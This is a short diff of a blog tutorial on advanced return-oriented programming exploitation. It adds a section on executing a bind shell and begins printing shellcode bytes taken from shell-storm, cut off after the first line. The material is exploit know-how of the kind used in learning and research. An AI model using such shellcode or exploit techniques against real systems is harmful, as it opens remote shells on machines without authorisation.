execas/execas.github.io/_posts/2020-01-11-advanced-rop.md

 So we can execute any type of shellcode we want, for example a reverse or bind shell.

+### Executing a bind shell

-Here's an example of running the exploit with a random bind shell I found on shell-storm:
+Here's an example of running the exploit with a random bind shell found on shell-storm:

 ```
 shellcode = ("\x48\x31\xc0"